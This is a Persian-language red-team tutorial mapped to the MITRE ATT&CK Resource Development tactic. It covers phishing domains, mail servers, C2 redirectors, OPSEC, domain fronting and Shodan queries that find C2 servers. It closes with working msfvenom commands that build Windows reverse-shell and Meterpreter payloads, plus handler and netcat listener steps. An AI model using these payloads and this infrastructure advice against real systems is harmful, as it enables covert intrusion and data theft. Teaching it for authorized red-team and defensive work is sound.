به قسمت دوم از سری آموزشی مایتر اتک خوش آمدید جهت دسترسی به ویدیو به لینک زیر مراجعه فرمایید:
در قسمت قبل دیدیم که TA ها به دنبال چه اطلاعاتی هستند و از چه روشهایی آن ها را بدست می آورند همچنین یکسری ابزار معروف در این زمینه نیز معرفی کردیم. پس از هر جمع آوری اطلاعاتی پیش از شروع عملیات نیازمند فراهم کردن پیش نیازهای عملیات هست. TA ها برای هر عملیات زیرساخت حمله را نسبت به عملیات فراهم و کانفیگ می کنند! مگر هر حمله با حمله دیگر فرقی هم می کند؟! بله گروه های APT با توجه به اطلاعاتی که در مرحله جمع آوری اطلاعات بدست می آورند اقدام به خرید سرور از لوکیشن خاص و همچنین دامین برای تارگت خاص می کنند. چرا؟ وقتی می خواهند اطلاعات سازمان را استخراج کنند اطلاعات به سمت دامین برود که کمتر جلب توجه کند و از رادار تیم آبی دور بمانند. همچنین دلیل مهم تر برای دسترسی اولیه نیاز به زیرساخت فیشینگ دارند که اولین شرطش داشتن دامین شبیه دامین هدفشان می باشد و مهم تر قبل از عملیات باید صبر کنند دامین حداقل 2 تا 3 ماه فعال باشد بعد اقدام به راه اندازی کمپین فیشینگ بکنند.
گاهی پیش می آید برای نفوذ به یک تارگت خاص TA ها یک سری اطلاعات از کارمندان آن تارگت خریداری می کنند ممکن است دسترسی اولیه بخرند یا حتی یوزر و پسورد که بحث Insider Attack پیش می آید ولی این خیلی کم پیش می آید.
گاهی نیز TA ها با گشت گذار در بین اطلاعاتی از ایمیل ها و یوزرهای کارمندان و مدیران سازمان هدف در دارک وب یا دیپ وب اقدام به خرید credentials می کنند مثلا LAP$u$ از این روش استفاده می کرد.
گروه های APT یا حتی ردتیمرها نیازمند زیرساخت برای پیاده سازی عملیات خود هستند. زیرساخت آن ها شامل موارد زیر می شود:
- میل سرور برای ارسال فیشینگ
- پیلودهای مختلف برای Initial و Execution
- راه اندازی C2 سرور برای مقاصد مختلف
- راه اندازی Redirector برای میل سرور و C2 برای عدم لو رفتن سرور اصلی و از دست دادن دسترسی وترافیک وب
- خرید VPS
- خرید دامین
- خرید ای پی اضافه
- و … ( اکسپلویت، خرید دسترسی اولیه و …)
Resource Development Domain VPS Mail Server
Weaponized Payloads
Social engineer to delivery Payload
Exploit a System to Gain Access
Cobalt Strike, covenant, Metasploit
تصویر زیر یک زیرساخت بیسیک برای ردتیمینگ را نمایش می دهد:
منبع :
https://github.com/bluscreenofjeff/Red-Team-Infrastructure-WiKi
دامین ها:
هر عملیات نیازمند یک دامین می باشد مختص به آن چرا؟
Web categorization
If you need to self-categorize domains, you can use any of these sites:
http://sitereview.bluecoat.com/sitereview.jsp
https://domain.opendns.com
لیست دامین های Expire شده
https://www.expireddomains.net/
https://talosintelligence.com/reputation_center
https://postmaster.google.com/u/0/managedomains
https://www.barracudacentral.org/lookups
https://sitelookup.mcafee.com/
منبع برای بررسی سایت های اکسپایر شده تعداد Archive از سایت
https://www.similarweb.com
منبع برای اینکه دامین مشابه به دامین های تارگت بدست بیاوریم. که شناسایی در خروج دیتا سخت شود. Exfilteration
Reputation
https://github.com/threatexpress/domainhunter
https://github.com/t94j0/AIRMASTER
https://github.com/Mr-Un1k0d3r/CatMyPhish
https://github.com/mdsecactivebreach/Chameleon
Categorization and Blacklist Checking Resources
https://trustedsource.org/en/feedback/url?action=checksingle
http://www.fortiguard.com/iprep
http://sitereview.bluecoat.com/sitereview.jsp
https://www.checkpoint.com/urlcat/main.htm
https://urlfiltering.paloaltonetworks.com/
https://secure2.sophos.com/en-us/support/contact-support.aspx
https://global.sitesafety.trendmicro.com/
http://www.brightcloud.com/tools/url-ip-lookup.php
https://archive.lightspeedsystems.com/
https://github.com/mdsecactivebreach/Chameleon
https://mxtoolbox.com/blacklists.aspx
راه اندازی زیرساخت فیشینگ:
http://www.iredmail.org/download.html
https://docs.iredmail.org/setup.dns.html
https://www.unlocktheinbox.com/dmarcwizard/
Phishing Frameworks
https://github.com/gophish/gophish
https://github.com/pentestgeek/phishing-frenzy
https://github.com/trustedsec/social-engineer-toolkit
https://github.com/Raikia/FiercePhish
Redirector ها:
socat udp4-recvfrom:53,reuseaddr,fork udp4-sendto:<IPADDRESS>; echo -ne
iptables :
iptables -I INPUT -p udp -m udp –dport 53 -j ACCEPTiptables -t nat -A PREROUTING -p udp –dport 53 -j DNAT –to-destination <IP-GOES-HERE>:53iptables -t nat -A POSTROUTING -j MASQUERADEiptables -I FORWARD -j ACCEPTiptables -P FORWARD ACCEPTsysctl net.ipv4.ip_forward=1
DNS ها
برای چک کردن اینکه آیا کانفیک میل سرور صحیح هست یا مشکل کجا هست از سایت
نکته مهم:
APT ها و Red Teamer ها OPSEC رعایت می کنند.
Opsec یعنی چی ؟
Operational security حفظ نکاتی امنیتی برای عدم لو رفتن یک عملیات Red Teaming می باشد. این نکات گاه می تواند از طریق کانفیگ درست C2 Redirector Mailserver و … باشد. یا حتی جا نگذاشتن رد پا در شبکه سازمان مقصد چرا که با هر ارتباط مستقیم تیم Red Team به سازمان هر نوع دستکاری کامند زدن کار با فایل یا پراسس احتمال شناسایی و بلاک شدن حمله بالا می رود.
Red Team operation موفق هست که بتواند مشابه APT مورد نظر اطلاعات سازمانی مستندات دیتابیس را از سازمان بدون شناسایی استخراج کند. برای اینکار باید زیرساخت که در ابتدای کار طراحی می شود مناسب باشد. خرید سرور از AWS, Azure,linod, …
استفاده از VPN Server
عوض کردن Hostname دیفالت کالی لینوکس
عوض کردن User Agent Browser Kali لینوکس کاملا قابل شناسایی می شوید!
جلوگیری از Browser leak
DNS leak, IP leak
شناسایی شدن توسط پورت، بنر سرویس و فایل Certificate پیش فرض چطوری ؟
تمامی سرورهای cobaltstrike
https://www.shodan.io/search?query=product%3A%22Cobalt+Strike+Beacon%22
پورت پیش فرض : tcp 50050
Cobaltstrike dns respond 0.0.0.0
سرورهای metasploit
https://www.shodan.io/search?query=ssl%3A%22MetasploitSelfSignedCA%22
سرورهای Covenant
سرورهای Mythic
https://www.shodan.io/search?query=ssl%3AMythic+port%3A7443
سرورهای Brute Ratel
https://www.shodan.io/search?query=http.html_hash%3A-1957161625
سرورهای DeimosC2
https://www.shodan.io/search?query=http.html_hash%3A-14029177
سرورهای Sliver c2
https://www.shodan.io/search/facet?query=ssl%3Amultiplayer+ssl%3Aoperators&facet=ssl.jarm
https://www.shodan.io/search?query=ssl%3A%22P18055077%22
سرورهای GoPhish
Domain Fronting
استفاده از CDNها به RT ها و TA ها کمک کرده تا فرآیند شناسایی آن ها بسیار پیچده تر از قبل شود تصور کنید برای ارتباط با قربانی از CDN شرکت cloudflare استفاده کنید به صورت پیش فرض ترافیک CDN ها ترافیک های مورد قبول برای سیستم های امنیتی هستند و شناسایی این ترافیک که آیا در پشت قضیه به یک سرور c2 متصل هست کار پیچیده ای است.
در واقع شما از SNI استفاده می کنید و داخل SNI پکت شما می داند باید به سرور C2 شما برسد بعد از رفتن تو cloudflare
SMTP Server Setup
استفاده از dispose mail برای ارسال فیشینگ
راه اندازی میل سرور و کانفیگ رکوردهای DNS -> PTR, SPF,DKIM,DMARK
PTR for resolving an IP address to its associated hostname
Send policy framework (SPF) records validates that the sending server (MAIL FROM) is authorized to send emails from the associated email domain
Determines if an email is from a trusted server
Domain keys identified mail (DKIM), is used by the mail server to digitally sign a mail message and its contents so that the receiving servers can confirm that the message is really originating from that email server
Domain-based message authentication, reporting, and conformance (DMARK) checks whether a message has entries for DKIM and SPF and actions to take if they don’t exist.
Check your purchased domain’s reputation
https://www.ipvoid.com/dns-reputation
https://www.zerobounce.net/services/dmarc-generator.html
https://docs.iredmail.org/setup.dns.html
ATT&CK – Resource Development (TA0042)
The adversary is trying to establish resources they can use to support operations.
Resource Development consists of techniques that involve adversaries creating, purchasing, or compromising/stealing resources that can be used to support targeting. Such resources include infrastructure, accounts, or capabilities. These resources can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as using purchased domains to support Command and Control, email accounts for phishing as a part of Initial Access, or stealing code signing certificates to help with Defense Evasion.
خرید VPS,Domain یا استفاده از سرورها یا دامین های هکی
Acquire Infrastructure T1583 [Adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services. Additionally, botnets are available for rent or purchase.]
Domains [Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.]
DNS Server [Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: Application Layer Protocol). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.]
Virtual Private Server [Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.]
Server [Adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of compromising a third-party Server or renting a Virtual Private Server, adversaries may opt to configure and run their own servers in support of operations.]
اگر قصد تخریب داشته باشند اجاره پنل بات نت .
Botnet [Adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks. Adversaries may purchase a subscription to use an existing botnet from a booter/stresser service. With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale Phishing or Distributed Denial of Service (DDoS).]
TA ها برای برقراری ارتباط c2 با قربانی برای اجرای دستورات ممکن است دستورات را روی یک بلاگ مشخص توییتر یا گوگل درایو بگذارند این عمل جهت عدم شناسایی و دور زدن مکانیسم های شناسایی می باشد.
Web Services [Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control (Web Service) or Exfiltration Over Web Service. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.]
یکی دیگر از روش هایی که TA ها امکان استفاده از آن را دارند با داشتن تنها یک ایمیل دسترسی به سرورهای کلاد داشته باشند فقط کافی است یک وب بر روی آن بالا بیاورند و دستورات C2 روی آن بگذارند. software as a service (SaaS)
Serverless [Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.]
استفاده از اکانت های هک شده پرتال سازمانی جهت ادامه مهندسی اجتماعی و سواستفاده از اعتماد ما بین کارمند وسازمان
Compromise Accounts T1586 [Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. Establish Accounts), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona.]
استفاده از اکانت های هک شده شبکه های اجتماعی جهت ادامه مهندسی اجتماعی و سواستفاده از اعتماد ما بین کارمند وسازمان
Social Media Accounts [Adversaries may compromise social media accounts that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating social media profiles (i.e. Social Media Accounts), adversaries may compromise existing social media accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona.]
استفاده از ایمیل های هک شده جهت ادامه مهندسی اجتماعی و سواستفاده از اعتماد ما بین کارمند وسازمان
Email Accounts [Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct Phishing for Information or Phishing. Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: Domains).]
استفاده از سرویس های کلاد متعلق به حساب های سازمانی جهت استخراج اطلاعات
Cloud Accounts [Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for Exfiltration to Cloud Storage or to Upload Tools. Cloud accounts can also be used in the acquisition of infrastructure, such as Virtual Private Servers or Serverless infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.]
در حینی که TA ها امکان خرید یا اجاره سرور دارند این امکان وجود دارد سرورهای هک شده قدیمی را جهت زیرساخت خود برای C2 یا استخراج اطلاعات مورد استفاده قرار بدهند.
Compromise infrastructure T1584 [Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle. Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.]
این عمل در دامین های به سرقت رفته با تغییر اطلاعات دامین نیز انجام می شود.
Domains [Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant. Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.]
DNS Server [Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: Application Layer Protocol). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.]
Virtual Private Server [Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.]
Server [Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a Server or Virtual Private Server, adversaries may compromise third-party servers in support of operations.]
Botnet [Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks. Instead of purchasing/renting a botnet from a booter/stresser service, adversaries may build their own botnet by compromising numerous third-party systems. Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers. With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale Phishing or Distributed Denial of Service (DDoS).]
Web Services [Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, etc. Adversaries may try to take ownership of a legitimate user’s access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control (Web Service) or Exfiltration Over Web Service. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them.]
Serverless [Adversaries may compromise serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.]
فراهم کردن بدافزار برای دزدی اطلاعات Credentials ها و Document ها
Develop Capabilities T1587 [Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.]
Malware [Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.]
Code Signing Certificates [Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with. Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don’t know who issued the certificate or who the author is.]
خیلی از اوقات وقتی شبکه های بزرگ سازمان مورد نفوذ قرار می گیرد برخی اطلاعات و منابع حساس سبب نفوذ به دیگر سازمان ها یا شرکت شود یکی از این موارد فایل های Certificate سازمان های بالا دستی می باشد که زیر مجموعه ها به آن ها تراست دارند و از آن در عملیات های دیگر استفاده می شود.
Digital Certificates [Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner’s identity, and the digital signature of an entity that has verified the certificate’s contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).]
در مرحله قبل گفتیم کلیه دارایی سازمان مورد ارزیابی TA ها قرار می گیرد از این رو آن ها می دانند دقیقا چه سخت افزارها یا نرم افزارها یا سیستم عامل ها با چه ورژن هایی در سازمان های تارگت قرار دارد و با توجه به ورژن در صورت آسیب پذیری اقدام به تهیه اکسپلویت عمومی یا خصوصی آن ها می کنند در نظر داشته باشید اکثر حملات از اکسپلویت های عمومی نسبتا جدیدی استفاده می شود که هنوز توسط سازمان پچ نشده است.
Exploits [Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits. Adversaries may use information acquired via Vulnerabilities to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.]
ایجاد یک کاراکتر برنامه نویس برای نفوذ به سازمان
Establish Accounts T1585 [Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.]
ایجاد شبکه های اجتماعی با کارکتر ساختگی
Social Media Accounts [Adversaries may create and cultivate social media accounts that can be used during targeting. Adversaries can create social media accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations.]
Email Accounts [Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct Phishing for Information or Phishing. Adversaries may also take steps to cultivate a persona around the email account, such as through use of Social Media Accounts, to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: Domains).]
ساخت اکانت های کلاد مختلف جهت استفاده Exfilter
Cloud Accounts [Adversaries may create accounts with cloud providers that can be used during targeting. Adversaries can use cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, MEGA, Microsoft OneDrive, or AWS S3 buckets for Exfiltration to Cloud Storage or to Upload Tools. Cloud accounts can also be used in the acquisition of infrastructure, such as Virtual Private Servers or Serverless infrastructure. Establishing cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.]
آماده کردن ابزارها Payload پیش از شروع حمله و تست آن ها
Obtain Capabilities T1588 [Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.]
Malware [Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.]
Tool [Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: PsExec). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as Cobalt Strike. Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.]
Code Signing Certificates [Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with. Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don’t know who issued the certificate or who the author is.]
Digital Certificates [Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner’s identity, and the digital signature of an entity that has verified the certificate’s contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.]
Exploits [Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.]
Vulnerabilities [Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.]
Stage Capabilities T1608 [Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed (Develop Capabilities) or obtained (Obtain Capabilities) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary (Acquire Infrastructure) or was otherwise compromised by them (Compromise Infrastructure). Capabilities may also be staged on web services, such as GitHub or Pastebin, or on Platform-as-a-Service (PaaS) offerings that enable users to easily provision applications.]
Upload Malware [Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable Ingress Tool Transfer by placing it on an Internet accessible web server.]
Upload Tool [Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or commercial. Tools can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: PsExec). Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable Ingress Tool Transfer by placing it on an Internet accessible web server.]
Install Digital Certificate [Adversaries may install SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are files that can be installed on servers to enable secure communications between systems. Digital certificates include information about the key, information about its owner’s identity, and the digital signature of an entity that has verified the certificate’s contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate securely with its owner. Certificates can be uploaded to a server, then the server can be configured to use the certificate to enable encrypted communication with it.]
بعضی از TA ها در مرحله اول به نتایجی می رسند که یک سازمان برای فرآیندی کاری از یک سایت استفاده می کند در همین راستا اقدام به نفوذ به سایت مورد نظر می کنند و با آلوده کردن سایت مذکور اقدام به دسترسی از سازمان می کنند.
Watering hole attack, Supply chain attack
Drive-by Target [Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in Drive-by Compromise. In such cases, the user’s web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as Application Access Token. Prior to Drive-by Compromise, adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired (Acquire Infrastructure) or previously compromised (Compromise Infrastructure).]
Link Target [Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in Malicious Link. Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in Spearphishing Link) or a phish to gain initial access to a system (as in Spearphishing Link), an adversary must set up the resources for a link target for the spearphishing link.]
یکی از روش های مورد استفاده از TA ها طراحی سایت آلوده و با استفاده SEO اقدام به بالا آوردن سایت فیک به جای سایت اصلی می کنند مخصوصا TA های کره شمالی برای سرقت کریپتو
SEO Poisoning [Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.]
به صورت خلاصه پس باید موارد زیر را برای هر عملیاتی حاظر کنیم:
- VPS
- Domain
- Credentials
- Info
- Exploit
- Payloads
ساده ترین بد افزاری که می توان در عملیات ردتیم خود استفاده کنید پیلودهای metasploit هستند که با ابزار msfvenom می توانید این کار را انجام دهید.
پیلودها به دو شکل Stager یا Stageless هستند یا تنها دانلود بدافزار جهت اتصال به Handler یا Teamserver شما هستند یا خودشان حاوی کد جهت برقراری سوکت جهت اتصال به شما هستند که به آنها Stageless گفته می شود.
msfvenom
Two major types of Payloads
Stager: They are commonly identified by second (/) such as windows/meterpreter/reverse_tcp
Just downloader
Stageless: The use of _ instead of the second / in the payload name such as windows/meterpreter_reverse_tcp
Full payload
Filess Payload run on memory hta, powershell
به صورت کلی جهت ساخت پیلود باید از ساختار زیر تبعیت کنید:
Msfvenom -p [staged/stageless] lhost=ipHacker lport=port listen -f exe > direct
Lhost= (IP of Kali)
Lport= (any port you wish to assign to the listener)
P= (Payload I.e. Windows, Android, PHP etc.)
F= file extension (i.e. windows=exe, android=apk etc.)
Bind shell [A bind shell is a kind that opens up a new service on the target machine and requires the attacker to connect to it in order to get a session]
msfvenom -p windows/meterpreter/bind_tcp -f exe > /root/Desktop/bind.exe
connect to Target
msf > use exploit/multi/handlermsf exploit(handler) > set payload windows/meterpreter/bind_tcpmsf exploit(handler) > set rhost 192.168.0.100msf exploit(handler) > set lport 4444msf exploit(handler) > exploit
Msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.219.128 lport=443 -f exe > staged.exe
Msfvenom -p windows/meterpreter_reverse_tcp lhost=192.168.219.128 lport=443 -f exe > staged.exe
Payload Type: Stager
msfvenom -p windows/shell_reverse_tcp lhost=192.168.219.128 lport=443 -f exe > shell.exe
nc –lvp 443
Payload Stageless
msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.219.128 lport=443 -f exe > shell.exe
nc –lvp 443